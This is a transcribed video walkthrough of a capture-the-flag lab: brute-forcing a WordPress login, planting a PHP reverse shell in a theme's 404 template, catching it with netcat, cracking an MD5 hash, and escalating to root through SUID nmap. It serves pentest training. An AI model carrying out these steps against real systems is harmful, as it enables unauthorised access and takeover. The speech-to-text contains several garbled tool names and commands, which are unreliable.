Literally it has so many files, but still it is working. It is worthy for us. We need to increase the speed to work it fastly. So I'll just increase the speed to 40, from 10 to 40, and then I'll click on start the attack. So when I click on start the attack, you can clearly see, I think I need to do one more thing. I think I need to highlight the issue, that basically the issue is based on invalid username, if I'm not wrong. So I need to highlight the issue, which is basically invalid username. Just copy the issue and then go back to the burp, go to the setting. Here you will grab extract. So just click on grab extract and then fetch the response. You will be able to fetch the response, and here in the response just search for the error, which is basically here, if I'm not wrong. So you can just select the error, that's all, with the dot. Okay, select the error with dot. So this is, you just need to select it. Let me do it for you one more time. This is how it works. Okay, I have literally just selected the error. Let me redo it. No, just click OK, that's fine. Now you can click on start the attack. Here on this side you will get the same error, you will see the same error, and if the error is vanished out, then it means that there is something else. So you can see we have sent 1000 plus requests. The Metasploit Pro is really faster as compared to the other tools. So we need to wait until it try to finds out the correct username for us. Alright, all we can do is to check for the errors. It is still taking some time. It's okay, give it a time until we get what we expecting. Okay, so it might take few seconds more, as it have sent more than 5000 requests. That's cool. All we can do is to wait a bit. Just stay with me, okay? So we are closer. 7000 requests done. You can see on the left bottom. So just wait. You can check for the lengths. All the requests have a same length, which is 4089 and 4090 in most of the cases. So all you can do is to look for those requests that have different length, because those requests might be the usernames. Remember, you can try to figure out the error with the help of requests, with the help of looking in the requests length, and with the help of looking for the error that you have set it up here. So you can use the both technique. All you need to do is to wait. Our attack is about to complete. So once it get completed, then we are good to go. That's why Metasploit is very faster, when it comes to username brute forcing, password brute forcing. You can use this kind of techniques in order to brute force. Yeah, so the scan is finished. The first thing, you can just click on this error, and literally when I click on the error, you can see the rest of the all the commands have invalid usernames, but here I got 3 users which say that the password you entered for let me see, whatever it is. So basically the password you have entered for the username elite is incorrect, which means that these are the users. So we just discover the users. Remember, the rest of the you can say requests giving me the same error, invalid username. Okay, if you scroll it far down, I'm 100% sure you will get the same error. But when I sorted it in this way, you can see I got some user. So I got elite ELLIOT. Let's hit it and see what kind of result it is giving me. So ELLIOT as a username, and we do not have the password, so just paste the same username, and you can literally see that the password you have entered for the username elite is incorrect, which means that we have successfully discovered the username. Yes, you heard me right. Now the second thing is we need to discover the password for it. Okay, now you can apply the same technique for discovering the password. So we just come to know that we have the username. You can just shut it down, and here you can now remove this log by just clicking on clear. So we need to hit the password section. So I'll just double click on the password and click it, and this is the time to brute force on the password. Then just go to the payload section. Remember, use the same you can say use the same list. You do not need to change the list as they have provided me. Use the same request poll, but remember, this time we need to do some modification in the grep extractor. So just remove the old one and click add, and this time just fetch the response. When we fetch the response, the error will be different this time. Okay, remember, the error will be different. Yes, you heard me right. It seems like we have to change the username too. Remember, you have to put the right username here, then it will work. ELLIOT, this is the correct user. You have to put the username in order to brute force the password. They are expecting us a valid username, that's why we are hitting on the target password. So after that, you just need to go to the settings and then just grep extractor and click fetch the response. After that, you will need to search for the error. Do you have any idea how to find it? I actually find it, to be honest. Here is. So the password you have entered for the username elite is basically wrong. So I just capture the few part of the error. The password you have entered for the username that's all. I want to track the same error. If I'm still getting the same error, which means that the password is not working at all for me. If the error get removed and I redirect it to any other page, means that the password has worked and I successfully logged into the machine. So I'll just click OK. After clicking on OK, literally I just need to start the attack. That's all I need to do. I need nothing else to do. So remember, here people are using alternative way to, and the alternative way is to use the world VP, to use the VP scan. So you can just type VP scan if you do not want to use burp suit -URL. Then you just need to provide the URL of the current login page. So you can just literally provide it. After providing the you can say URL, the next thing that you can do is to use the username, which is basically elite, and then you can use the password with -p, which is basically we do not have a password, that's why we need to you can say use the list. Now to use the list we need to go to the robot, and there we will need to use the where I just go into the templates. No, this is a robot. Okay, I just need to go to the home directory, Kali, downloads, robots, and then I just need to check the second one, which is basically fsociety.list. That's all you need to do, and then you can hit enter. Okay, it will do, it will start it brute forcing the usernames, the password list on the elite username. So you can literally use the VP scan, whatever you are interested in you can use it, it doesn't matter at all. So as for my recommendation, you can just go with the burp suit because it is way more faster than anything, and literally it have executed more than 6,000 requests till now, and it is still starting. So yeah, it's depend on you, so no worries at all, you can go with whatever you want to do. Okay, the next thing is we need to wait. I hope we get the password. So let's see what happened. So, and it has started the attack. It seems like the WordPress is VP scan is also doing its good job, and after that we have to keep an eye on our brute force too. We are almost close, so all you need to do is to wait. Yeah, I hope you are learning a lot. This is going to boost your pen test journey because you are performing here some actual attacks. Okay, so yeah, it seems like it has started working. Don't know why it is scanning the target, but literally it will ultimately at the end of the day find out the username for us. Right now I will just close it with Control Z because my second one you can say burp suit is already running. It is taking so much usage, RAM and memory and power. That's why I need to stick with one method right now. You can go with both. It will definitely at the end of the day you will get the results. So let me click on stronger and see if I am getting something. Currently I am not able to check anything because of the attack. So we need to wait, brothers and sisters. Okay, it has slowed down. Like once we done with it, what next? For example, what we will do if we successfully get any user, if we successfully hack into the WordPress, if we successfully get the password of the elite user, then what we will actually then we will use their we will try to get the reverse connection. We will try to connect with the server directly, so we will be able to do remote code execution on the target machines. Yes, our main goal is to, once we get into the WordPress, our second task will be to basically get the reverse shell of the particular machine. To do this, we need a reverse shell that is written in PHP. Now you will be asking me why we need in PHP, because the backend of WordPress is written in PHP language. That's why you need a shell according to the language, according to the backend designed. Like if it is an ASP, you have to go with ASP shell. If it is in PHP, you have to go with PHP, and the rest of the JSP, etc. too. So yeah, all you can do is to go to the Google and search for the shell. So you can just open the new tab and type php shell pen test monkey. That's all you need to do. So they are offering the shells. You can just check for this one. Okay, this one is amazing. So you can just look for it, and then you can just copy from here if you want. And if in the meanwhile I'll show you, so don't worry. Open the sample panel or just click on raw. So just click on the raw here. If you see it, just click on the raw, so you will be able to download it in a good way. Just then copy the pen test monkey reverse shell URL, and then go back to the machine, maximize it. Our attack will be started. Our attack is about to end. Until what we will do, I will just get the pen test monkey reverse shell. So you can see that I just need to type ls. I just paste it in a wrong way, so I just go to the robots, and here I'll just get it. Okay, yeah, you can see it. I have reverse shell. You can just open it in nano, or whatever you are interested in. You can literally open it. So this is how the reverse shell look like in PHP programming language. Here you need to provide your IP address and your port number. That's all you need to do some modification. After that you can drop this reverse shell on the target machine, and if it get executed, you will get the reverse connection on your listener. So right now I'm going to close it without any kind of modification. We will modify it once we hack into the WordPress. So our scan has been completed. I just need to click on the strong this, and literally I got something here with 302 redirection, and this was the payload that get executed, and it gives me no error, which means that something happens on the server. I just need to go with this password. Okay, so just copy the password, and after copying the password, just go back here and paste the password. I hope it will work for me. Remember me, just click on the logged in, and boom, you can see we just cracked the password. That was the second phase that we done. So here we successfully hack into the password, and this is how the dashboard looks like. That was the dashboard, and we just hacked the WordPress website. Okay, that's cool. After that, if you are not familiar with WordPress, it might be a bit confusing for you, but if you are familiar with WordPress, you already know that this is the dashboard of WordPress website. This is how the WordPress website dashboard looks like when you are logged in as an admin user, and you can literally see I'm an admin user vp -admin theme.php. I'm currently in the theme, that's why it's showing me the theme.php. The next thing is we need to click on appearance, and in the appearance section we have the editor. I want to find something where I can upload my code, and when I upload my code, I actually want to execute that code on the server, so I will get the reverse connection. This is the time to get the reverse connection. To do this, we have already the you can say the PHP shell, reverse shell. So all I can do is first I will type if config in order to get my tunnel 0 IP address. So just copy this. You can also see it here, and you can just literally use the leaf pad or anyone you are interested in. So just open the PHP reverse shell, scroll it a bit, and here you will be able to see the IP address that you need to change. So just remove this and paste your own IP, and here you can change the port. Like I want 1337 port. Okay, so I just change it. You do nothing to do extra, so you can just close it. It seems like we have done with this phase. So after doing this, the next thing is we need to upload that shell. Okay, we need to upload that shell. So I can literally open it again, and I will copy the entire code. I have to paste it somewhere because I want to execute it on the server. So if I'm not wrong, you can clearly see here on the right side different pages where you can literally edit them. Okay, you can literally edit them. And I will just go with this 404 error one, and I will remove everything from it, and I will paste my own reverse shell. So yeah, I'm tricking the server. And then you can just, the next thing that you can literally do is if I'm not wrong, you can just click on upload the file, update the file, and you can see that the file has been updated, which means that instead of this 404 template, I put my own, I just put my own reverse shell. Okay, now before executing it, I want to set up my listener for incoming connection. Okay, so I'll just literally open a new tab, and in the new tab I will use netcat for reverse shell. So just use ncat-n VLP and the port number that you have set on your you can say on your reverse shell. So my listener, my netcat listener is waiting for incoming connection. NVLP, everything is fine. Then the next thing is we need to execute that 404 page in order to get the reverse shell. So it seems like I should show you in this way, so you will get how actually it works when it comes to, I'll literally open, I will shut down my burp suit. There is no need, because I've already done with it. I'm going to close this one too, don't mind. But we actually you can say, hey, we do not need you anymore, so you can please go back from where you belong. Okay, after that we need to let's open the website. Open the website normally, and now we need to give the path of that 404.php. yeah, so you can literally just type / and what was the name for, can you see the name here with my cursor? Look at my cursor, 404.php. this is the path, this is the exact path. Okay, 404.php. you can also see the file name is 404.php. so what I'll do here, I'll just type 404.php, and when I execute it, just look at the right side, you will get the reverse shell. Hit enter, and boom, you can see I got the reverse connection. So yeah, no, I have the control on the server. I can do whatever I want, literally. I'm just into their server. I got the reverse shell, I got the reverse connection. If I go to home and ls cd robot and ls, you can see I literally got the second key too. So you can just go with the key 2 of damn 3.txt, and you can see that I was about to got it, but it's okay. The permission is denied, I do not have a permission, but still I have password raw md5. there is some sort of password in md5. so all you can do is to copy it and look for it, what it contains. Just get it and paste it. It is containing a password for the robot user, so which is basically md5 password. we need to crack it. Okay, so just copy it and then go to the Google and type CrackStation, CrackStation, CrackStation. it is the first website. I'm doing it a bit faster because these are the easy steps. you just need to crack the password. So it is a free hash cracker. you can just paste the username and password, or even though just the password, it will be work for you. So then just click on check crack. it is unknown, we need to remove the username. Okay, we need to remove it, definitely. only paste the password, remember. And boom, you can see this is the result, which is the decoded version or unencrypted version of the password. So this is the password for robot user, and this is the robot, which is basically a robot user. So do you have any idea how you can switch to the robot user? You can actually literally switch to the robot user by just typing surobot. This is how you can switch to the robot user. Must be run from the terminal. What to say, man. Let's say from the home directory. No, in my home. No, let's go with sudo cat so robot. What does this mean? Must be run from a terminal. Like, actually we are into the terminal. What does this mean at all? So guys, I just got the conclusion, I just got the solution. Okay, if you remember, I was trying to switch to sudo robot and it was not working for me at all. Whenever you will get the reverse shell, remember you have to use this command in order that your terminal should work perfectly. So let me show you. This is the command. You need to import something in order to everything should work perfectly. So python -c import pty dot spawn bin bash. So a shell will be executed and everything will be started working fine. For example, if you are trying to do sudo robot, you can see it is not working. So that's why you need to paste that command. And now you can see your terminal has been changed. Now everything will be work. So the next thing you need to do is to switch your user from this current user to robot. So just type sudo robot and it is expecting for the password. Just go for the password which is here that we have correct. So just copy it and paste it here with control V, and you can clearly see we have shifted to the robot user. So if I type the let's see what kind of privilege it has. So just type cat key 2 out of 3. You can see that I have get the second key too. So just copy it and then after copying it, just paste it in the second phase. So it seems like we have done the key out of 3. So what is the next thing? The next thing is we need to find out the key, and the key is basically we have no idea that what to do next. So basically, to find out the third key, we need to do something which is important. Okay, we have to go with the so we have to escalate our privileges from a normal user towards a root user. To do this, you just need to type sudo -l as it is expecting me password, which means that this is on this account it might be not work for us. So the password was, let me paste it. Oh no, this is not the password. So the password was here in the correct station. Just copy it and paste it here. I know in this case it might be not work for me. So the main thing is what we can do actually. Okay, so again we have to escalate the privileges in order to find the last flag which is located in the root directory. Our last flag in the root directory. So we have to be the root user. It is called we have to be the root user. We have to be the root user. We do not have any other way. So the main thing is like what we can do. We have to run a script on the machine in order to find the something for us. That if you remember in the automation phase, I have tell you that how you can run automation scripts, automation tools in order to find out the vulnerabilities that arise in that is related with the privilege escalation. So we are going to run a script called nm.sh. So I'll just go to the Google and type nm.sh. Okay, Okay, I just got an error, so just go to the google.com and paste it there. Sorry, just remove everything, the rest one. Okay, yeah, this is going to be the tool that we are using it. Just click on the raw, and after clicking the raw, just copy it, and then just try to go to the temp directory and do everything there, if you remember. Okay, now just download the script by typing wget and /, and you can clearly see it is trying to connect. If the machine have internet connection, it will connect, otherwise we have to do it locally in our own machine, then we have to shift it to the target machine. So I know it is not going to work for us, that's why we need to do it on our own machine. Yeah, so the next thing is we need to do, you can see we have linenum.sh. Just just run your server. So to run the server, we have to run the Python server, I think. Python 3 -m server, http.server, and then just provide any one port number. Okay, we have just provided the port number. It is running on the current location where the linenum.sh exists. Okay, so the next thing that you will need to do is to go back. Like, as far as it is not working, if okay, I just terminated the entire stuff. This is why I just had this. So just reload it one time more in order to get the reverse shell. Okay, I got the reverse shell. Now shift your user, import it. I'm sorry, but you have to do it, it happens. Okay, now just shift your user, and you need to provide the password. Provide the password and go to the temp directory. Now we need to perform everything here. We need to download that script from my machine to here. Okay, so just type wget http, use the http protocol // remember my IP address, which is this one. So 10.14.75.146, and then you need to provide the port number. So the port number is, if I'm not wrong, is 444 and 5. So just type 444 and 5, then just paste the name of the script, which is linenum.sh, and hit enter, and you can clearly see it has been downloaded here. And the next thing that I'll need to do is to give it executable permission, chmod +x linenum.sh. Now the next thing that we will need to do is to execute this script. So just execute it with linenum.sh. okay, it has been run successfully. Now it will give me all the possible vectors through which I will be able to hack into the system and try to escalate my privileges. It will work faster, don't worry, it won't take time. All right, so we have so many interesting things. Yeah, so if you remember last time, I have told you that whenever you see something with red errors, with the red stuff, it means that there might be lookable. You have to look for this. We have so many techniques to exploit this machine. Okay, you can literally see we have so many things to exploit this machine. But currently, the most easy one for me and for the tutorial is to teach you through SU bits. So SUID files, we will try to exploit this machine SUID files. Yeah, and this SUID files, last time, if you remember, I have told you that what if you are working as a SOC analyst or a pen tester and you are not a root user, so the company or the administrator allow you to run to run Nmap without the password, because Nmap required usually administrator password. So you can clearly see we have Nmap bits here that we can possibly exploit this without without the password. So we can leverage our privileges using this Nmap. What I'll do, I'll just go to Google and type GTFO bins. If you remember, you just need to type GTFO bins and just go here, then just search for Nmap, and literally we have Nmap, and we need to exploit this Nmap using SUID. So this one here, just click on it and you can literally see that we have this thing to exploit it. Okay, so yeah, we have, seems like we have get the stuff that we need to run. So what we can do, you can just use this in order to exploit it. So if I run the Nmap in interactive mode, then it will expecting me the password. And remember, let's try to run the Nmap with interactive mode. So yeah, what I'll do here, I'll just clear the screen and I'll type Nmap -- interactive, and you can see I am inside in Nmap with interactive mode. No, this is the time where I will exploit this Nmap. I'll tell to the Nmap that, hey, please give me the base shell, which is the most powerful shell, and you can do whatever you want. If it gives me that particular shell, then we will become a root user and we will execute the privileges. That's why I have used here hyphen this, sorry, exclamatory mark sh. So if I type sh, and you can clearly see, boom, that I have not the root user. I just run this command, Nmap hyphen interactive. Now you will be confused that why I just run it. If you come here and you just go back to the ChatGPT and ask for kindly explain this in short way, always use ChatGPT. Okay, so you can clearly see Nmap is a powerful network scanning tool used to discover hosts and services on a computer network. When you run it with the hyphen interactive option, it start an interactive mode where you can enter the command directly with the Nmap program without needing the exit and run it again, without needing to exit and run it again. Remember, we can just give direct command to the Nmap, as Nmap is running with the root privileges without asking me the password. That's why I have used interactive mode, so I can give the commands to the Nmap, and at the end of the day, when I give it a command to execute me a bash script, and it literally successfully worked for me. So now we need to go to the root directory, and if you ls it, we have the third one key. You can just copy the third key and you can just copy it, and then you can submit it here. It is going to work for you, and you will be see that, boom, congratulations, you have solved this lab. This is how the pen test work. Okay, we will perform some other labs, so you will get some core idea, core concept over this machine, over this kind of machines. So I hope you learn a lot from this tutorial. If you have any question, please let me know, and don't worry, I will provide you the notes too, where you will be able to you will be definitely able to do what you actually want to do. So yeah, at first try to do it by yourself by watching the video. If you are still confused, you can do you can just use some copy paste technique. It's up to you. Take care. Bye.